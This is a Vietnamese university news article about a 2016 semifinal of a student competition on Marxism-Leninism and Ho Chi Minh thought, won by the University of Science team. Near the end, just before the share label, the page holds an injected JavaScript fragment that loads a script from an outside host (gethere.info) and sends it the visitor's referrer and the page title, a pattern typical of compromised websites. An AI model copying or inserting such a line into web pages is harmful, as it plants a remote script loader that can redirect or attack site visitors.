Cuộc hội ngộ “nhiều duyên số” với 2 đội thi rất mạnh đã từng chạm trán trong các cuộc thi Olympic các môn khoa học Mác- Lênin, tư tưởng Hồ Chí Minh “Tầm nhìn xuyên thế kỷ” và “Ánh sáng thời đại” các năm trước – 2 đội đến từ trường Đại học Lao động – Xã hội CS IIĐại học Y khoa Phạm Ngọc Thạch – trong trận Bán kết 2 tổ chức vào tối thứ năm (05/05/2016) vừa qua đã mang đến nhiều cảm xúc cho tất cả khán giả và các đội dự thi tại Hội trường Nhà văn hóa Thanh niên. Xuất sắc vượt qua 2 đội bạn, đội tuyển cán bộ trẻ KHTN1 đã giành được tấm vé cuối cùng để góp mặt vào vòng chung kết Hội thi tìm hiểu chủ nghĩa Mác – Lênin và tư tưởng Hồ Chí Minh “Ánh sáng thời đại” lần VII năm 2016.

Xuyên suốt 4 vòng thi: Điểm son lịch sử, Con đường chân lý, Bản lĩnh nhà giáo trẻ và Ánh sáng thời đại, đội tuyển ĐH KHTN1 luôn giữ vững phong độ của mình và giành chiến thắng với 278 điểm, tạo khoảng cách khá xa với đội về nhì là ĐH Lao động – Xã hội CSII 188 điểm, đội ĐH Y khoa Phạm Ngọc Thạch về Ba với 107 điểm.

13133296_634870359999373_5300348952279603132_n

Ngay từ vòng thi đầu tiên “Điểm son lịch sử”, đội tuyển ĐH KHTN1 với sự nhanh nhạy và kiến thức của mình đã tạo một khoảng cách với hai đội còn lại với điểm số 90. Với bước đà ở vòng 1, trong vòng 2 “Con đường chân lý” bằng sự bình tĩnh, đoàn kết giữa các thành viên, cùng sự quyết đoán, nhanh chóng bấm chuông trả lời chính xác các dữ kiện được đưa ra ngay từ những giây đầu tiên, ĐH KHTN1 đã tô đủ 5 ô màu và tìm ra Con đường chân lý cho mình. Kết thúc vòng 2, đội tuyển ĐH KHTN1 tiếp tục dẫn đầu cuộc đua với 150 điểm, đội B ĐH Lao động – Xã hội CSII 70 điểm và đội C ĐH Y khoa Phạm Ngọc Thạch 45 điểm. Ở vòng thi Bản lĩnh nhà giáo trẻ, các đội tỏ ra khá ngang tài ngang sức khi trình bày và tranh luận về các tình huống thực tế thường gặp trong quá trình công tác của người Giảng viên, cán bộ trẻ. Phần thi này đã nhận được những tràng pháo tay ủng hộ nhiệt tình từ phía khán giả dành cho cách xử lý tình huống hết sức khéo léo và thuyết phục của các nhà giáo trẻ. Vòng thi “Ánh sáng thời đại” là vòng thi ghi dấu nhiều sự bứt phá của các đội để giành được chiến thắng cuối cùng. Cả 3 đội thi với kiến thức sâu rộng và sự tự tin của mình đã cùng nhau đưa ra đáp án chính xác để mang về những điểm số quyết định. Kết quả cuối cùng được ấn định khi đội ĐH KHTN1 bấm chuông và trả lời chính xác từ khóa: Bức tranh Lễ kết nạp Đảng ở Điện Biên Phủ, giành chiến thắng thuyết phục với 278 điểm.

IMG_3093

Giống như phần giới thiệu mở đầu của 3 đội thi, trận Bán kết 2 là một cuộc hội ngộ bất ngờ, cả 3 đội thi đều xứng đáng giành chiến thắng vì đều rất bản lĩnh, có kiến thức rất tốt, đã vượt qua rất nhiều đội thi xuất sắc khác để có mặt ở trận Bán kết 2 này. Tuy nhiên, đối với ĐH KHTN1, chiến thắng này không chỉ nhờ vào nỗ lực hết mình của từng thành viên trong đội, sự quan tâm và cổ vũ nhiệt tình của các cổ động viên, mà chiến thắng này còn xuất phát từ tình yêu và sự đam mê nghiên cứu, tìm hiểu kiến thức về các môn khoa học Mác – Lênin và Tư tưởng Hồ Chí Minh. Chính vì tình yêu và sự đam mê đó mà ĐH Khoa họcTự nhiên không bao giờ vắng mặt tại các sân chơi, các hội thi tìm hiểu về các môn khoa học Mác – Lênin và Tư tưởng Hồ Chí Minh như Tầm nhìn xuyên thế kỷ, Ánh sáng thời đại, Ánh sáng soi đường,… để được học hỏi và củng cố thêm những kiến thức còn thiếu, rút ra được những kinh nghiệm cho bản thân để từng bước trưởng thành hơn qua các sân chơi, các hội thi này.

IMG_3097

Chia tay 2 đội bạn để bước tiếp vào vòng Chung kết, Đội tuyển KHTN1 sẽ cố gắng thi đấu hết mình vì một tình yêu, một niềm đam mê, một khát khao chinh phục tri thức, vì màu cờ sắc áo của Đại học Khoa học Tự nhiên – ĐHQG TP. HCM.

Hẹn gặp tất cả các bạn tại vòng Chung kết Hội thi “Ánh sáng thời đại” lần VII năm 2016 vào lúc 18h00 ngày 10/05/2016 tại Hội trường Nhà văn hóa Thanh niên.

Ảnh: Quốc Linh – Tin bài: Duy Tân

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

CHIA SẺ